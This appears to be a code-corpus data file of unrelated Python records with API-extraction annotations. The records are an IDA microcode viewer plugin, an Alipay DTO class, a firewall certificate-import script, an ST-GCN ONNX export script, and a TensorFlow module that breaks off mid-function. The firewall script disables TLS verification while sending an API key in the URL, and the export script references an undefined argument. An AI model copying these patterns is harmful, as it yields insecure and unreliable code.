def _ui_init_widget(self):
"""
Initialize an IDA widget for this UI control.
"""
# create a dockable widget, and save a reference to it for later use
self._twidget = ida_kernwin.create_empty_widget(self.WINDOW_TITLE)
# cast the IDA 'twidget' to a less opaque QWidget object
self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
# hooks to help track the container/widget lifetime
class ExplorerUIHooks(ida_kernwin.UI_Hooks):
def widget_invisible(_, twidget):
if twidget == self._twidget:
self.visible = False
self._cleanup()
def widget_visible(_, twidget):
if twidget == self._twidget:
self.visible = True
# install the widget lifetime hooks
self._ui_hooks = ExplorerUIHooks()
self._ui_hooks.hook()
def _ui_init_list(self):
"""
Initialize the microcode maturity list.
"""
self._maturity_list = LayerListWidget()
def _ui_init_code(self):
"""
Initialize the microcode view(s).
"""
self._code_view = MicrocodeView(self.model)
self._code_sync = MicroCursorHighlight(self.controller, self.model)
self._code_sync.track_view(self._code_view.widget)
def _ui_init_settings(self):
"""
Initialize the explorer settings groupbox.
"""
self._checkbox_cursor = QtWidgets.QCheckBox("Highlight mutual")
self._checkbox_cursor.setCheckState(QtCore.Qt.Checked)
self._checkbox_verbose = QtWidgets.QCheckBox("Show use/def")
self._checkbox_sync = QtWidgets.QCheckBox("Sync hexrays")
self._checkbox_sync.setCheckState(QtCore.Qt.Checked)
self._groupbox_settings = QtWidgets.QGroupBox("Settings")
layout = QtWidgets.QVBoxLayout()
layout.addWidget(self._checkbox_cursor)
layout.addWidget(self._checkbox_verbose)
layout.addWidget(self._checkbox_sync)
self._groupbox_settings.setLayout(layout)
def _ui_layout(self):
"""
Layout the major UI elements of the widget.
"""
layout = QtWidgets.QGridLayout()
# arrange the widgets in a 'grid' row col row span col span
layout.addWidget(self._code_view.widget, 0, 0, 0, 1)
layout.addWidget(self._maturity_list, 0, 1, 1, 1)
layout.addWidget(self._groupbox_settings, 1, 1, 1, 1)
# apply the layout to the widget
self.widget.setLayout(layout)
def _ui_init_signals(self):
"""
Connect UI signals.
"""
self._maturity_list.currentItemChanged.connect(lambda x, y: self.controller.select_maturity(x.text()))
self._code_view.connect_signals(self.controller)
self._code_view.OnClose = self.hide # HACK
# checkboxes
self._checkbox_cursor.stateChanged.connect(lambda x: self.controller.set_highlight_mutual(bool(x)))
self._checkbox_verbose.stateChanged.connect(lambda x: self.controller.set_verbose(bool(x)))
self._checkbox_sync.stateChanged.connect(lambda x: self._code_sync.enable_sync(bool(x)))
# model signals
self.model.mtext_refreshed(self.refresh)
self.model.maturity_changed(self.refresh)
#--------------------------------------------------------------------------
# Misc
#--------------------------------------------------------------------------
def refresh(self):
"""
Refresh the microcode explorer UI based on the model state.
"""
self._maturity_list.setCurrentRow(self.model.active_maturity - 1)
self._code_view.refresh()
class LayerListWidget(QtWidgets.QListWidget):
"""
The microcode maturity list widget
"""
def __init__(self):
super(LayerListWidget, self).__init__()
# populate the list widget with the microcode maturity levels
self.addItems([get_mmat_name(x) for x in get_mmat_levels()])
# select the first maturity level, by default
self.setCurrentRow(0)
# make the list widget a fixed size, slightly wider than it needs to be
width = self.sizeHintForColumn(0)
self.setMaximumWidth(int(width + width * 0.10))
def wheelEvent(self, event):
"""
Handle mouse wheel scroll events.
"""
y = event.angleDelta().y()
# scrolling down, clamp to last row
if y < 0:
next_row = min(self.currentRow()+1, self.count()-1)
# scrolling up, clamp to first row (0)
elif y > 0:
next_row = max(self.currentRow()-1, 0)
# horizontal scroll ? nothing to do..
else:
return
self.setCurrentRow(next_row)
class MicrocodeView(ida_kernwin.simplecustviewer_t):
"""
An IDA-based text area that will render the Hex-Rays microcode.
TODO: I'll probably rip this out in the future, as I'll have finer
control over the interaction / implementation if I just roll my own
microcode text widget.
For that reason, excuse its hacky-ness / lack of comments.
"""
def __init__(self, model):
super(MicrocodeView, self).__init__()
self.model = model
self.Create()
def connect_signals(self, controller):
self.controller = controller
self.OnCursorPosChanged = lambda: controller.select_position(*self.GetPos())
self.OnDblClick = lambda _: controller.activate_position(*self.GetPos())
self.model.position_changed(self.refresh_cursor)
def refresh(self):
self.ClearLines()
for line in self.model.mtext.lines:
self.AddLine(line.tagged_text)
self.refresh_cursor()
def refresh_cursor(self):
if not self.model.current_position:
return
self.Jump(*self.model.current_position)
def Create(self):
if not super(MicrocodeView, self).Create(None):
return False
self._twidget = self.GetWidget()
self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
return True
def OnClose(self):
pass
def OnCursorPosChanged(self):
pass
def OnDblClick(self, shift):
pass
def OnPopup(self, form, popup_handle):
controller = self.controller
#
# so, i'm pretty picky about my UI / interactions. IDA puts items in
# the right click context menus of custom (code) viewers.
#
# these items aren't really relevant (imo) to the microcode viewer,
# so I do some dirty stuff here to filter them out and ensure only
# my items will appear in the context menu.
#
# there's only one right click context item right now, but in the
# future i'm sure there will be more.
#
class FilterMenu(QtCore.QObject):
def __init__(self, qmenu):
super(QtCore.QObject, self).__init__()
self.qmenu = qmenu
def eventFilter(self, obj, event):
if event.type() != QtCore.QEvent.Polish:
return False
for action in self.qmenu.actions():
if action.text() in ["&Font...", "&Synchronize with"]: # lol..
qmenu.removeAction(action)
self.qmenu.removeEventFilter(self)
self.qmenu = None
return True
p_qmenu = ctypes.cast(int(popup_handle), ctypes.POINTER(ctypes.c_void_p))[0]
qmenu = sip.wrapinstance(int(p_qmenu), QtWidgets.QMenu)
self.filter = FilterMenu(qmenu)
qmenu.installEventFilter(self.filter)
# only handle right clicks on lines containing micro instructions
ins_token = self.model.mtext.get_ins_for_line(self.model.current_line)
if not ins_token:
return False
class MyHandler(ida_kernwin.action_handler_t):
def activate(self, ctx):
controller.show_subtree(ins_token)
def update(self, ctx):
return ida_kernwin.AST_ENABLE_ALWAYS
# inject the 'View subtree' action into the right click context menu
desc = ida_kernwin.action_desc_t(None, 'View subtree', MyHandler())
ida_kernwin.attach_dynamic_action_to_popup(form, popup_handle, desc, None)
return True
#-----------------------------------------------------------------------------
# Util
#-----------------------------------------------------------------------------
class ViewCursor(object):
"""
TODO
"""
def __init__(self, line_num, x, y, mapped=True):
self.line_num = line_num
self.x = x
self.y = y
self.mapped = mapped
@property
def text_position(self):
return (self.line_num, self.x)
@property
def viewport_position(self):
return (self.line_num, self.x, self.y)
| [
"ida_kernwin.jumpto",
"ida_kernwin.get_screen_ea",
"ida_kernwin.create_empty_widget",
"lucid.microtext.translate_mtext_position",
"ida_funcs.get_func",
"PyQt5.QtWidgets.QVBoxLayout",
"lucid.microtext.remap_mtext_position",
"ida_kernwin.PluginForm.TWidgetToPyQtWidget",
"PyQt5.QtWidgets.QGroupBox",
... | [((1926, 1959), 'lucid.ui.subtree.MicroSubtreeView', 'MicroSubtreeView', (['insn_token.insn'], {}), '(insn_token.insn)\n', (1942, 1959), False, 'from lucid.ui.subtree import MicroSubtreeView\n'), ((2164, 2208), 'ida_graph.viewer_set_titlebar_height', 'ida_graph.viewer_set_titlebar_height', (['gv', '(15)'], {}), '(gv, 15)\n', (2200, 2208), False, 'import ida_graph\n'), ((2656, 2692), 'ida_kernwin.refresh_idaview_anyway', 'ida_kernwin.refresh_idaview_anyway', ([], {}), '()\n', (2690, 2692), False, 'import ida_kernwin\n'), ((2857, 2893), 'ida_kernwin.refresh_idaview_anyway', 'ida_kernwin.refresh_idaview_anyway', ([], {}), '()\n', (2891, 2893), False, 'import ida_kernwin\n'), ((3218, 3245), 'ida_funcs.get_func', 'ida_funcs.get_func', (['address'], {}), '(address)\n', (3236, 3245), False, 'import ida_funcs\n'), ((3325, 3342), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (3340, 3342), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((3541, 3577), 'ida_kernwin.refresh_idaview_anyway', 'ida_kernwin.refresh_idaview_anyway', ([], {}), '()\n', (3575, 3577), False, 'import ida_kernwin\n'), ((3773, 3796), 'lucid.util.hexrays.get_mmat', 'get_mmat', (['maturity_name'], {}), '(maturity_name)\n', (3781, 3796), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((11755, 11772), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (11770, 11772), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((13061, 13146), 'lucid.microtext.translate_mtext_position', 'translate_mtext_position', (['position', 'self._mtext[mmat_src]', 'self._mtext[mmat_dst]'], {}), '(position, self._mtext[mmat_src], self._mtext[mmat_dst]\n )\n', (13085, 13146), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((13816, 13876), 'lucid.util.python.register_callback', 'register_callback', (['self._mtext_refreshed_callbacks', 'callback'], {}), '(self._mtext_refreshed_callbacks, callback)\n', (13833, 13876), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14000, 14048), 'lucid.util.python.notify_callback', 'notify_callback', (['self._mtext_refreshed_callbacks'], {}), '(self._mtext_refreshed_callbacks)\n', (14015, 14048), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14189, 14250), 'lucid.util.python.register_callback', 'register_callback', (['self._position_changed_callbacks', 'callback'], {}), '(self._position_changed_callbacks, callback)\n', (14206, 14250), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14385, 14434), 'lucid.util.python.notify_callback', 'notify_callback', (['self._position_changed_callbacks'], {}), '(self._position_changed_callbacks)\n', (14400, 14434), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14568, 14629), 'lucid.util.python.register_callback', 'register_callback', (['self._maturity_changed_callbacks', 'callback'], {}), '(self._maturity_changed_callbacks, callback)\n', (14585, 14629), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14757, 14806), 'lucid.util.python.notify_callback', 'notify_callback', (['self._maturity_changed_callbacks'], {}), '(self._maturity_changed_callbacks)\n', (14772, 14806), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((15860, 15908), 'ida_kernwin.display_widget', 'ida_kernwin.display_widget', (['self._twidget', 'flags'], {}), '(self._twidget, flags)\n', (15886, 15908), False, 'import ida_kernwin\n'), ((15917, 16009), 'ida_kernwin.set_dock_pos', 'ida_kernwin.set_dock_pos', (['self.WINDOW_TITLE', '"""IDATopLevelDockArea"""', 'ida_kernwin.DP_RIGHT'], {}), "(self.WINDOW_TITLE, 'IDATopLevelDockArea',\n ida_kernwin.DP_RIGHT)\n", (15941, 16009), False, 'import ida_kernwin\n'), ((16979, 17029), 'ida_kernwin.create_empty_widget', 'ida_kernwin.create_empty_widget', (['self.WINDOW_TITLE'], {}), '(self.WINDOW_TITLE)\n', (17010, 17029), False, 'import ida_kernwin\n'), ((17118, 17175), 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', (['self._twidget'], {}), '(self._twidget)\n', (17160, 17175), False, 'import ida_kernwin\n'), ((18031, 18080), 'lucid.ui.sync.MicroCursorHighlight', 'MicroCursorHighlight', (['self.controller', 'self.model'], {}), '(self.controller, self.model)\n', (18051, 18080), False, 'from lucid.ui.sync import MicroCursorHighlight\n'), ((18281, 18320), 'PyQt5.QtWidgets.QCheckBox', 'QtWidgets.QCheckBox', (['"""Highlight mutual"""'], {}), "('Highlight mutual')\n", (18300, 18320), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18417, 18452), 'PyQt5.QtWidgets.QCheckBox', 'QtWidgets.QCheckBox', (['"""Show use/def"""'], {}), "('Show use/def')\n", (18436, 18452), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18483, 18518), 'PyQt5.QtWidgets.QCheckBox', 'QtWidgets.QCheckBox', (['"""Sync hexrays"""'], {}), "('Sync hexrays')\n", (18502, 18518), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18623, 18654), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['"""Settings"""'], {}), "('Settings')\n", (18642, 18654), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18672, 18695), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', ([], {}), '()\n', (18693, 18695), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((19009, 19032), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', ([], {}), '()\n', (19030, 19032), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((22962, 23019), 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', (['self._twidget'], {}), '(self._twidget)\n', (23004, 23019), False, 'import ida_kernwin\n'), ((25212, 25286), 'ida_kernwin.attach_dynamic_action_to_popup', 'ida_kernwin.attach_dynamic_action_to_popup', (['form', 'popup_handle', 'desc', 'None'], {}), '(form, popup_handle, desc, None)\n', (25254, 25286), False, 'import ida_kernwin\n'), ((1682, 1709), 'ida_kernwin.get_screen_ea', 'ida_kernwin.get_screen_ea', ([], {}), '()\n', (1707, 1709), False, 'import ida_kernwin\n'), ((3362, 3391), 'lucid.util.hexrays.get_microcode', 'get_microcode', (['func', 'maturity'], {}), '(func, maturity)\n', (3375, 3391), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((3412, 3450), 'lucid.microtext.MicrocodeText', 'MicrocodeText', (['mba', 'self.model.verbose'], {}), '(mba, self.model.verbose)\n', (3425, 3450), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((5064, 5111), 'ida_kernwin.jumpto', 'ida_kernwin.jumpto', (['token.target_address', '(-1)', '(0)'], {}), '(token.target_address, -1, 0)\n', (5082, 5111), False, 'import ida_kernwin\n'), ((13294, 13370), 'lucid.microtext.remap_mtext_position', 'remap_mtext_position', (['position', 'self._mtext[mmat_src]', 'self._mtext[mmat_dst]'], {}), '(position, self._mtext[mmat_src], self._mtext[mmat_dst])\n', (13314, 13370), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((6446, 6463), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (6461, 6463), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((6809, 6826), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (6824, 6826), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((11280, 11318), 'lucid.microtext.MicrocodeText', 'MicrocodeText', (['mtext.mba', 'self.verbose'], {}), '(mtext.mba, self.verbose)\n', (11293, 11318), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((11409, 11474), 'lucid.microtext.translate_mtext_position', 'translate_mtext_position', (['self.current_position', 'mtext', 'new_mtext'], {}), '(self.current_position, mtext, new_mtext)\n', (11433, 11474), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((20865, 20881), 'lucid.util.hexrays.get_mmat_name', 'get_mmat_name', (['x'], {}), '(x)\n', (20878, 20881), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((24427, 24458), 'ctypes.POINTER', 'ctypes.POINTER', (['ctypes.c_void_p'], {}), '(ctypes.c_void_p)\n', (24441, 24458), False, 'import ctypes\n'), ((20891, 20908), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (20906, 20908), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO import PaidOuterCardCycleSellConfDTO
from alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO import PaidOuterCardManageUrlConfDTO
from alipay.aop.api.domain.PaidOuterCardSellingConfDTO import PaidOuterCardSellingConfDTO
class PaidOuterCardTemplateConfDTO(object):
def __init__(self):
self._cycle_selling_conf = None
self._manage_url_conf = None
self._open_selling_conf = None
@property
def cycle_selling_conf(self):
return self._cycle_selling_conf
@cycle_selling_conf.setter
def cycle_selling_conf(self, value):
if isinstance(value, PaidOuterCardCycleSellConfDTO):
self._cycle_selling_conf = value
else:
self._cycle_selling_conf = PaidOuterCardCycleSellConfDTO.from_alipay_dict(value)
@property
def manage_url_conf(self):
return self._manage_url_conf
@manage_url_conf.setter
def manage_url_conf(self, value):
if isinstance(value, PaidOuterCardManageUrlConfDTO):
self._manage_url_conf = value
else:
self._manage_url_conf = PaidOuterCardManageUrlConfDTO.from_alipay_dict(value)
@property
def open_selling_conf(self):
return self._open_selling_conf
@open_selling_conf.setter
def open_selling_conf(self, value):
if isinstance(value, PaidOuterCardSellingConfDTO):
self._open_selling_conf = value
else:
self._open_selling_conf = PaidOuterCardSellingConfDTO.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.cycle_selling_conf:
if hasattr(self.cycle_selling_conf, 'to_alipay_dict'):
params['cycle_selling_conf'] = self.cycle_selling_conf.to_alipay_dict()
else:
params['cycle_selling_conf'] = self.cycle_selling_conf
if self.manage_url_conf:
if hasattr(self.manage_url_conf, 'to_alipay_dict'):
params['manage_url_conf'] = self.manage_url_conf.to_alipay_dict()
else:
params['manage_url_conf'] = self.manage_url_conf
if self.open_selling_conf:
if hasattr(self.open_selling_conf, 'to_alipay_dict'):
params['open_selling_conf'] = self.open_selling_conf.to_alipay_dict()
else:
params['open_selling_conf'] = self.open_selling_conf
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = PaidOuterCardTemplateConfDTO()
if 'cycle_selling_conf' in d:
o.cycle_selling_conf = d['cycle_selling_conf']
if 'manage_url_conf' in d:
o.manage_url_conf = d['manage_url_conf']
if 'open_selling_conf' in d:
o.open_selling_conf = d['open_selling_conf']
return o
| [
"alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO.PaidOuterCardManageUrlConfDTO.from_alipay_dict",
"alipay.aop.api.domain.PaidOuterCardSellingConfDTO.PaidOuterCardSellingConfDTO.from_alipay_dict",
"alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO.PaidOuterCardCycleSellConfDTO.from_alipay_dict"
] | [((898, 951), 'alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO.PaidOuterCardCycleSellConfDTO.from_alipay_dict', 'PaidOuterCardCycleSellConfDTO.from_alipay_dict', (['value'], {}), '(value)\n', (944, 951), False, 'from alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO import PaidOuterCardCycleSellConfDTO\n'), ((1254, 1307), 'alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO.PaidOuterCardManageUrlConfDTO.from_alipay_dict', 'PaidOuterCardManageUrlConfDTO.from_alipay_dict', (['value'], {}), '(value)\n', (1300, 1307), False, 'from alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO import PaidOuterCardManageUrlConfDTO\n'), ((1620, 1671), 'alipay.aop.api.domain.PaidOuterCardSellingConfDTO.PaidOuterCardSellingConfDTO.from_alipay_dict', 'PaidOuterCardSellingConfDTO.from_alipay_dict', (['value'], {}), '(value)\n', (1664, 1671), False, 'from alipay.aop.api.domain.PaidOuterCardSellingConfDTO import PaidOuterCardSellingConfDTO\n')] |
import requests
import argparse
import urllib3
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("--TARGET_IP", help="IP address of the firewall", type=str)
parser.add_argument("--api_key", help="Firewall API Key", type=str)
parser.add_argument("--CERT_NAME", help="Certificate Label", type=str)
parser.add_argument("--CERT_FILE", help="Certificate File Name", type=str)
args = parser.parse_args()
target_ip = args.TARGET_IP
api_key = args.api_key
cert_name = args.CERT_NAME
cert_file = args.CERT_FILE
url = 'https://{}/api/?type=import&format=pem&category=certificate&certificate-name={}&key={}'.format(target_ip, cert_name, api_key)
files = {'file': ( cert_file, open('../../working/' + cert_file, 'rb'), 'application/octet-string', {'Expires': '0'})}
r = requests.post(url, files=files, verify=False)
print(r.text)
| [
"urllib3.disable_warnings",
"requests.post",
"argparse.ArgumentParser"
] | [((101, 149), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['InsecureRequestWarning'], {}), '(InsecureRequestWarning)\n', (125, 149), False, 'import urllib3\n'), ((161, 186), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (184, 186), False, 'import argparse\n'), ((871, 916), 'requests.post', 'requests.post', (['url'], {'files': 'files', 'verify': '(False)'}), '(url, files=files, verify=False)\n', (884, 916), False, 'import requests\n')] |
# ============================================================================
# Copyright 2018-2019 Open-MMLab. All rights reserved.
# Apache License
# Version 2.0, January 2004
# http://www.apache.org/licenses/
#
# TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import torch
from mmskeleton.utils import call_obj, load_checkpoint
def pt2onnx():
"""ST-GCN export script to convert pt model to ONNX model.
Args:
-ckpt: input checkpoint file path
-onnx: output onnx file path
-batch_size: define batch_size of the model
Returns:
Null. export onnx model with the input parameter -onnx
"""
# define input parameter
parser = argparse.ArgumentParser(
description='ST-GCN Pytorch model convert to ONNX model')
parser.add_argument('-ckpt',
default='./checkpoints/st_gcn.kinetics-6fa43f73.pth',
help='input checkpoint file path')
parser.add_argument('-onnx',
default='./st-gcn_kinetics-skeleton_bs1.onnx',
help='output onnx file path')
parser.add_argument('batch_size', default=1,
help='define batch_size of the model')
args = parser.parse_args()
model_cfg = {'type': 'models.backbones.ST_GCN_18',
'in_channels': 3,
'num_class': 400,
'edge_importance_weighting': True,
'graph_cfg': {'layout': 'openpose', 'strategy': 'spatial'}}
model = call_obj(**model_cfg)
print("========= ST_GCN model ========")
print(model)
print("===============================")
load_checkpoint(model, args.checkpoint, map_location='cpu')
model.eval()
input_name = ["input1"]
output_name = ["output1"]
dummy_input = torch.randn(int(args.batch_size), 3, 300, 18, 2, device='cpu')
torch.onnx.export(model, dummy_input, args.onnx,
input_names=input_name, output_names=output_name)
if __name__ == "__main__":
pt2onnx() | [
"mmskeleton.utils.call_obj",
"torch.onnx.export",
"argparse.ArgumentParser",
"mmskeleton.utils.load_checkpoint"
] | [((1785, 1871), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""ST-GCN Pytorch model convert to ONNX model"""'}), "(description=\n 'ST-GCN Pytorch model convert to ONNX model')\n", (1808, 1871), False, 'import argparse\n'), ((2535, 2556), 'mmskeleton.utils.call_obj', 'call_obj', ([], {}), '(**model_cfg)\n', (2543, 2556), False, 'from mmskeleton.utils import call_obj, load_checkpoint\n'), ((2668, 2727), 'mmskeleton.utils.load_checkpoint', 'load_checkpoint', (['model', 'args.checkpoint'], {'map_location': '"""cpu"""'}), "(model, args.checkpoint, map_location='cpu')\n", (2683, 2727), False, 'from mmskeleton.utils import call_obj, load_checkpoint\n'), ((2889, 2991), 'torch.onnx.export', 'torch.onnx.export', (['model', 'dummy_input', 'args.onnx'], {'input_names': 'input_name', 'output_names': 'output_name'}), '(model, dummy_input, args.onnx, input_names=input_name,\n output_names=output_name)\n', (2906, 2991), False, 'import torch\n')] |
# fits better in a StyleGAN or small network implementation, but provides a good
# proof of concept (especially for things like fashion MNIST)
import tensorflow as tf
from .utils import Conv2D as SpecializedConv2D
def nslice(rank, dim):
start = tuple(slice(None) for i in range(dim))
end = tuple(slice(None) for i in range(rank - dim - 1))
def inner(*args):
return start + (slice(*args),) + end
return inner
class Dimension(tf.Module):
def __init__(self, rank, primary, kernel, stride, size=None, channels=1,
channel_axis=None, disjoint=False, register=None, name=None):
name = name or f"axis{primary}"
super().__init__(name=name)
self.rank, self.primary, self.kernel = rank, primary, kernel
self.stride, self.size, self.disjoint = stride, size, disjoint
self.channels, self.channel_axis = channels, channel_axis
self.register = register or tf.Variable
with self.name_scope:
self.initialize()
def expand(self, tensor):
shape = tf.ones((self.rank,), dtype=tf.int64)
shape = tf.tensor_scatter_nd_update(shape, [[self.primary]], [-1])
tensor = tf.reshape(tensor, shape)
if self.channel_axis is not None:
tensor = tf.repeat(tensor, self.channels, self.channel_axis)
return tensor
def group(self, tensor, start, prefix=False):
flip = slice(None, None, -1) if prefix else slice(None)
tensor = tf.concat((tensor, self.default((self.stride - 1,)))[flip], 0)
end = tf.size(tensor) - (tf.size(tensor) - start) % self.stride
return self.reduce(tf.reshape(tensor[start:end], (-1, self.stride)), 1)
def consolidate(self, middle, start, end, dim=None, rank=None):
if middle > 0:
return middle, start, end
dim = self.primary if dim is None else dim
rank = self.rank if rank is None else rank
empty = tf.constant([], shape=[int(i != dim) for i in range(rank)])
if middle == 0:
return 0, empty, tf.concat((start, end), dim)
idx = nslice(rank, dim)
over = self.overlap(start[idx(middle, None)], end[idx(-middle)])
return 0, empty, tf.concat(
(start[idx(middle)], over, end[idx(-middle, None)]), dim)
def pad(self, size):
pad = tf.nn.relu(self.kernel - 1 - ((size - 1) % self.stride))
start = (self.kernel - 1) // 2 - pad // 2
end = (pad - 1) // 2 % self.stride
return -(-size // self.stride), start, end
def initialize(self, start, end):
if self.size is not None:
out, ss, es = self.pad(self.size)
if self.disjoint:
start, end = start[ss::self.stride], end[es::self.stride]
start, end = start[:out], end[-out:]
else:
start, end = self.group(start, ss), self.group(end, es, True)
if tf.size(end) > out:
over = tf.size(end) - out + 1
end = tf.concat(([self.reduce(end[:over])], end[over:]), 0)
if tf.size(start) > out:
edge = self.reduce(start[out - 1:])
start = tf.concat((start[:out - 1], [edge]), 0)
self.middle = out - tf.size(start) - tf.size(end)
if self.disjoint:
self.middle, start, end = self.consolidate(
self.middle, start, end, 0, 1)
self.start, self.end = self.expand(start), self.expand(end)
if tf.size(start) > 0:
self.start = self.register(self.start, name="start")
if tf.size(end) > 0:
self.end = self.register(self.end, name="end")
def __call__(self, size=None):
if self.size is None:
assert size is not None
if self.disjoint:
start, end = self.start, self.end
else:
start = self.conv(self.start, True)
end = self.conv(self.end, False)
out, ss, es = self.pad(size)
idx = nslice(self.rank, self.primary)
start = start[idx(ss, None, self.stride)]
end = end[idx(es, None, self.stride)]
start, end = start[idx(out)], end[idx(-out, None)]
return self.consolidate(out - tf.shape(start)[self.primary] -
tf.shape(end)[self.primary], start, end)
elif self.disjoint:
return self.middle, self.start, self.end
return self.consolidate(self.middle, self.conv(self.start, True),
self.conv(self.end, False))
class Reweight(Dimension):
def initialize(self):
res = tf.range((self.kernel + 1) // 2, self.kernel, dtype=tf.float32)
res = tf.cast(self.kernel, tf.float32) / res if self.disjoint \
else (res + 1) / res
super().initialize(res[(self.kernel + 1) % 2:], res[::-1])
def conv(self, x, reverse):
if tf.size(x) == 0:
return x
return tf.math.cumprod(x, self.primary, reverse=reverse)
@classmethod
def default(cls, *args, **kw):
return tf.ones(*args, **kw)
@classmethod
def compose(cls, a, b):
return a * b
@classmethod
def overlap(cls, a, b):
return a * b / (a + b - a * b)
@classmethod
def reduce(cls, *args, **kwargs):
return tf.math.reduce_prod(*args, **kwargs)
class Offset(Dimension):
def initialize(self):
start = tf.zeros(((self.kernel - 1) // 2,))
end = tf.zeros((self.kernel // 2,))
super().initialize(start, end)
def conv(self, x, reverse):
if tf.size(x) == 0:
return x
return tf.math.cumsum(x, self.primary, reverse=reverse)
@classmethod
def default(cls, *args, **kw):
return tf.zeros(*args, **kw)
@classmethod
def compose(cls, a, b):
return a + b
@classmethod
def overlap(cls, a, b):
return a + b
@classmethod
def reduce(cls, *args, **kwargs):
return tf.math.reduce_sum(*args, **kwargs)
class Border(tf.Module):
def __init__(self, rank, kernel, stride, size=None, empty=(), channels=1,
channel_axis=None, disjoint=False, register=None, name=None):
super().__init__(name=name)
self.rank = rank
size = (None,) * rank if size is None else size
empty = tuple(rank + i if i < 0 else i for i in empty)
channel_axis = rank + channel_axis if channel_axis is not None \
and channel_axis < 0 else channel_axis
self.channels, self.channel_axis = channels, channel_axis
ax = [i for i in range(rank) if i not in empty and i != channel_axis]
with self.name_scope:
self.ax = tuple(self.base(
rank, dim, kernel[i], stride[i], size[dim], channels,
channel_axis, disjoint, register) for i, dim in enumerate(ax))
def __call__(self, size=None):
ax = [ax(None if size is None else size[ax.primary]) for ax in self.ax]
def build(idx=0, sides=(), expand=()):
if idx == len(self.ax):
if not sides:
shape = [1] * self.rank
if self.channel_axis is not None:
shape[self.channel_axis] = self.channels
for i, val in expand:
shape[i] = val
return self.base.default(shape)
res = sides[0]
for side in sides[1:]:
res = self.base.compose(res, side)
for axis, repeats in expand:
